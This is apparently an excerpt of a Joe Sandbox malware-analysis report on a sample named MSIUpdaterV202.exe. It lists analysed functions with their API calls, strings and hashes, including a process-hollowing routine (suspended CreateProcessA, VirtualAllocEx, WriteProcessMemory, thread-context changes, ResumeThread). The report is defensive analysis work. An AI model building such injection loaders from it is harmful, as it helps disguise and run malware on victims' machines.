Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorFreeHeapLast___free_lconv_mon
String ID: P0U$x1U
API String ID: 4068849827-3806253719
Opcode ID: 7ab9515fc4848c2d7415dd190a6b94de96821da76249544366dd94c4c7b59eae
Instruction ID: a38bc6c93d0bfb76ad8a89856fe3ab96a1312811629c3328b59126d3a80175ef
Opcode Fuzzy Hash: 7ab9515fc4848c2d7415dd190a6b94de96821da76249544366dd94c4c7b59eae
Instruction Fuzzy Hash: DF315E71600709AFEB21AA3ADC05B6777E9AF00719F15441FE248D7251DE79ED508B2C

Function 004E7F8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 004E7FB2

Strings

MOC, xrefs: 004E7FC4
RCC, xrefs: 004E7FCC

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 68aba8471a79af2f42dd709a78cab412eeb2652ce3b8ae7839b04ac8fc76934d
Instruction ID: 3c27b253f1e4662149a2195372bbe1c4de0b15c3151c4a2121bbfc13ac45f746
Opcode Fuzzy Hash: 68aba8471a79af2f42dd709a78cab412eeb2652ce3b8ae7839b04ac8fc76934d
Instruction Fuzzy Hash: A541AA72900249AFCF15DF96CC81AEEBBB1FF48315F19809AF908A7221D739A950CB54

Function 004E8922 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,004E8A9D,00000002,FlsGetValue,004FEC68,FlsGetValue,00000000,?,004E792D,?,004E5C62), ref: 004E89A5
GetProcAddress.KERNEL32(00000000,?), ref: 004E89AF

Strings

b\N, xrefs: 004E8948

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: b\N
API String ID: 3013587201-863549587
Opcode ID: 7015a5cf9902318c450c73472416ccf57dc04eac4348ebae866a57c61bd489ba
Instruction ID: 39fbd0ef8c91503e8b91af9d02c912c34294a243d0e2c909b964886e94df285f
Opcode Fuzzy Hash: 7015a5cf9902318c450c73472416ccf57dc04eac4348ebae866a57c61bd489ba
Instruction Fuzzy Hash: A911B1B1A002559F8F22CF66DC909BA73A4FB49366714016EEA09D7311EF34DD02DB9B

Analysis Process: MSIUpdaterV202.exePID: 5044, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	0%
Total number of Nodes:	1511
Total number of Limit Nodes:	24

Executed Functions

Function 0136018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 013602FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0136030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0136032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01360351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0136037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 013603D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0136041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0136045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 01360499
ResumeThread.KERNELBASE(?), ref: 013604A8

Strings

ress, xrefs: 01360217
Load, xrefs: 013601CB
GetP, xrefs: 0136020F
aryA, xrefs: 013601D3

Memory Dump Source

Source File: 00000009.00000002.2188593983.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1360000_MSIUpdaterV202.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 6821a04f7108e26dcf2ca569f9133da542bd0bf5b4365c359109c1aa5647ddaa
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: FFB1E67660024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CAB345D774FA518B94

Function 00BFEFA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,34A80F21,?,00BFF0B5,?,?,00000000,00000000), ref: 00BFF069

Strings

api-ms-, xrefs: 00BFEFFF
ext-ms-, xrefs: 00BFF013

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 89aaf0074af9e4c16b338aa514c9aee687454c9486634d08e53773df4ced2d3c
Instruction ID: 333fbcc5cb969cc12821033035529ea9f7c4554a2f31b1fa3ee0148024b42966
Opcode Fuzzy Hash: 89aaf0074af9e4c16b338aa514c9aee687454c9486634d08e53773df4ced2d3c
Instruction Fuzzy Hash: 7C21D131A0121AABD7359B74AC84B7E3798DF12764F2501B0EB16AB292EB70ED05C690

Function 00C0C1F7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00C0C2E6), ref: 00C0C20B

Part of subcall function 00C0C151: _Deallocate.LIBCONCRT ref: 00C0C1EC

CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00C0C23F
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00C0C2E6), ref: 00C0C24B
CloseHandle.KERNEL32(00000000,?,?,00C0C2E6), ref: 00C0C252

Strings

MZx, xrefs: 00C0C231
ole, xrefs: 00C0C1FA

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
String ID: MZx$ole
API String ID: 440434604-1145851472
Opcode ID: 84f6a68eda495439d35f8b35121100a58b27627530a43599aa47d3d20b714068
Instruction ID: 1c6aaa94bb05f58f48f726a992f272cc82b0b13fd91380d38a9eaead940f4ed2
Opcode Fuzzy Hash: 84f6a68eda495439d35f8b35121100a58b27627530a43599aa47d3d20b714068
Instruction Fuzzy Hash: BDF0A7B620111C7FD12033A29C89FBF3E5CDB477E9F420220F70A911828A152C0292B5

Function 00BFC0A9 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00BFC0A3,00000000,00BF8CD2,?,?,34A80F21,00BF8CD2,?), ref: 00BFC0BA
TerminateProcess.KERNEL32(00000000,?,00BFC0A3,00000000,00BF8CD2,?,?,34A80F21,00BF8CD2,?), ref: 00BFC0C1
ExitProcess.KERNEL32 ref: 00BFC0D3

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7746d599943f5e4d0c7333fb548f8ff714cd8b78a9c4c8130e87669d15ae9680
Instruction ID: 8fb47c4faa3f15816ecf2db04a5322254e6bde0a42f239a119d063177b143dd0
Opcode Fuzzy Hash: 7746d599943f5e4d0c7333fb548f8ff714cd8b78a9c4c8130e87669d15ae9680
Instruction Fuzzy Hash: 25D0677140050CABCB112FA0EE0DA6D3F6AAB40399F054050BA0A5B032CF369AA7DA40

Function 00BFF073 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b5fc055c79b4649f97f5f09291dcd9e15c0174de7eaf4470d02e73d448afa0
Instruction ID: 1314502278b7e5ec77bbc1ff195ec12a478365f3283f4723eafb815c51a9c070
Opcode Fuzzy Hash: 41b5fc055c79b4649f97f5f09291dcd9e15c0174de7eaf4470d02e73d448afa0
Instruction Fuzzy Hash: 7401F53330052A9BAB258E7AEC40E7E33E6EFC53207248174FA05CB195DE70C8098791

Non-executed Functions

Function 00C07596 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00C078B4,00000002,00000000,?,?,?,00C078B4,?,00000000), ref: 00C0762F
GetLocaleInfoW.KERNEL32(?,20001004,00C078B4,00000002,00000000,?,?,?,00C078B4,?,00000000), ref: 00C07658
GetACP.KERNEL32(?,?,00C078B4,?,00000000), ref: 00C0766D

Strings

ACP, xrefs: 00C075B4
OCP, xrefs: 00C075EA

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f47178794c03b5a868bedc74f490379cfb8258844947d6b1388f097e6e16e21f
Instruction ID: 7a44a58096f7a012ddaf98aeb32331e44e8c38ae7cdcb2b7c395ed9ce31f1b27
Opcode Fuzzy Hash: f47178794c03b5a868bedc74f490379cfb8258844947d6b1388f097e6e16e21f
Instruction Fuzzy Hash: C721A422E08904AADB3C8F59C904BD772A6EB50F54B568624F91BC7290E733EF41D350

Function 00C0776B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BFEA50: GetLastError.KERNEL32(?,00000008,00C02F56,00000000,00BF8E50), ref: 00BFEA54
Part of subcall function 00BFEA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00BFEAF6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C07877
IsValidCodePage.KERNEL32(00000000), ref: 00C078C0
IsValidLocale.KERNEL32(?,00000001), ref: 00C078CF
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C07917
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C07936

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: b5580e82675832da864ab4827b9156b01be0667cbd9b7d8677ad0c669acb672f
Instruction ID: 076fbb24ff65c0a5789217032b508f102b9266292d48e8de43a79948215dd55d
Opcode Fuzzy Hash: b5580e82675832da864ab4827b9156b01be0667cbd9b7d8677ad0c669acb672f
Instruction Fuzzy Hash: F0517D71E04209ABEB18DFA5CC49BBE77B8BF48700F158769E515E71D0E770AA44CB60

Function 00C06E07 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BFEA50: GetLastError.KERNEL32(?,00000008,00C02F56,00000000,00BF8E50), ref: 00BFEA54
Part of subcall function 00BFEA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00BFEAF6

GetACP.KERNEL32(?,?,?,?,?,?,00BFCA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C06EC8
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00BFCA5C,?,?,?,00000055,?,-00000050,?,?), ref: 00C06EF3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C07056

Strings

utf8, xrefs: 00C06FC5

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 51dd0be78ef2ab69407f803782678595d82b6d522b6465de48fcf99dd6cb4dae
Instruction ID: 14199181e82c98f440c9a1b92494da5f3d32536daee434f96017fb3fec36ae34
Opcode Fuzzy Hash: 51dd0be78ef2ab69407f803782678595d82b6d522b6465de48fcf99dd6cb4dae
Instruction Fuzzy Hash: 8371F375A00306AAEB24AF75DC42FBA77A8EF05704F14446AF626D71C1EB70EA60D760

Function 00BF4D66 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00BF4D72
IsDebuggerPresent.KERNEL32 ref: 00BF4E3E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BF4E57
UnhandledExceptionFilter.KERNEL32(?), ref: 00BF4E61

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5f460eef947bb624fb5d3fad329c38bf76948140f99a9c99083b04d0e0fb6887
Instruction ID: 90aabeaddf114c27f22306e97fa16bc544c5b05545aaf44f0fbf004f7b236239
Opcode Fuzzy Hash: 5f460eef947bb624fb5d3fad329c38bf76948140f99a9c99083b04d0e0fb6887
Instruction Fuzzy Hash: 1431E5B5D0522C9ADB20DFA4D9497DDBBF8AF08304F1041EAE50DAB250EB709A85CF45

Function 00C0C25D Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BF10D0: __EH_prolog3_catch.LIBCMT ref: 00BF10D7
Part of subcall function 00BF10D0: _strlen.LIBCMT ref: 00BF10E9

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00C0C285

Part of subcall function 00BF163E: _strlen.LIBCMT ref: 00BF1656

_strlen.LIBCMT ref: 00C0C2A0
_strlen.LIBCMT ref: 00C0C2B6
GetProcAddress.KERNEL32(00000000,?), ref: 00C0C2D3

Part of subcall function 00C0C1F7: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00C0C2E6), ref: 00C0C20B
Part of subcall function 00C0C1F7: CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00C0C23F
Part of subcall function 00C0C1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00C0C2E6), ref: 00C0C24B
Part of subcall function 00C0C1F7: CloseHandle.KERNEL32(00000000,?,?,00C0C2E6), ref: 00C0C252

Part of subcall function 00BF1BEA: _Deallocate.LIBCONCRT ref: 00BF1BF9

Strings

Free, xrefs: 00C0C28B
Madino Mino, xrefs: 00C0C26F
Cons, xrefs: 00C0C29A, 00C0C29F, 00C0C2A7
kernel32.dll, xrefs: 00C0C280
ole, xrefs: 00C0C2B0, 00C0C2B5, 00C0C2BD

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
String ID: Cons$Free$Madino Mino$kernel32.dll$ole
API String ID: 4115190924-2348686229
Opcode ID: c01766a2ad95968b4ea40ef63caf4cd45a820b883dc188c883e3ecf47eb8b320
Instruction ID: 7f51fa049316c12ca005058a72dc6e844c0846c4ab1195580c9a73b93cae17c1
Opcode Fuzzy Hash: c01766a2ad95968b4ea40ef63caf4cd45a820b883dc188c883e3ecf47eb8b320
Instruction Fuzzy Hash: AC01C475D00208AECB14FBE4DC569FE73F8EE44B00B100869F502A71D1DE74690AC626

Function 00BF7BE8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 00BF7D07
___TypeMatch.LIBVCRUNTIME ref: 00BF7E15
_UnwindNestedFrames.LIBCMT ref: 00BF7F67
CallUnexpected.LIBVCRUNTIME ref: 00BF7F82

Strings

csm, xrefs: 00BF7D3E
csm, xrefs: 00BF7C25
csm, xrefs: 00BF7C92

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 09f113ae21c2eb08c236ce5f6b828e66bc2dbc4cf590bccc153d732750e94e70
Instruction ID: b899724eac73abd566115bb9b1cc5b70b51c774ba160d369dde2bb5acb8b4e2b
Opcode Fuzzy Hash: 09f113ae21c2eb08c236ce5f6b828e66bc2dbc4cf590bccc153d732750e94e70
Instruction Fuzzy Hash: C7B1387184420DAFCF25DFA5C8819BEBBF5EF14310B1441EAEA116B212DB31EE59CB91

Function 00C0163C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00C018B5

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 970f42ae8fb8e48eb12142af07904a32e4f25db3ec66a1779b3562b9419b0138
Instruction ID: 301e38c900829b5915a2aa0b07e6d2c50afda2c72720e8a6db5d4159a3c854ad
Opcode Fuzzy Hash: 970f42ae8fb8e48eb12142af07904a32e4f25db3ec66a1779b3562b9419b0138
Instruction Fuzzy Hash: 7AB1F574A04249AFDB15DF99C880BBDFBF2BF49300F188199E9519B2D2CB719E41CB60

Function 00C098B9 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(015512D0,015512D0,?,7FFFFFFF,?,00C09B89,015512D0,015512D0,?,015512D0,?,?,?,?,015512D0,?), ref: 00C0995F
__alloca_probe_16.LIBCMT ref: 00C09A1A
__alloca_probe_16.LIBCMT ref: 00C09AA9
__freea.LIBCMT ref: 00C09AF4
__freea.LIBCMT ref: 00C09AFA
__freea.LIBCMT ref: 00C09B30
__freea.LIBCMT ref: 00C09B36
__freea.LIBCMT ref: 00C09B46

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: e04ab13cafd662b594f1d07125c917f7bfa6e3decb3fa085486761bc46d9f7c0
Instruction ID: cd6dd902ff06f33e1dd428b202bf5dbd0ddda90caaf3b3983f1ee4dbff6fe455
Opcode Fuzzy Hash: e04ab13cafd662b594f1d07125c917f7bfa6e3decb3fa085486761bc46d9f7c0
Instruction Fuzzy Hash: 6271C272904209ABDF319F549C82FAFB7E9DF85720F290059E928A72C3D7359E04D7A1

Function 00BF429A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00BF42E3
__alloca_probe_16.LIBCMT ref: 00BF430F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00BF434E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF436B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00BF43AA
__alloca_probe_16.LIBCMT ref: 00BF43C7
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF4409
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BF442C

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
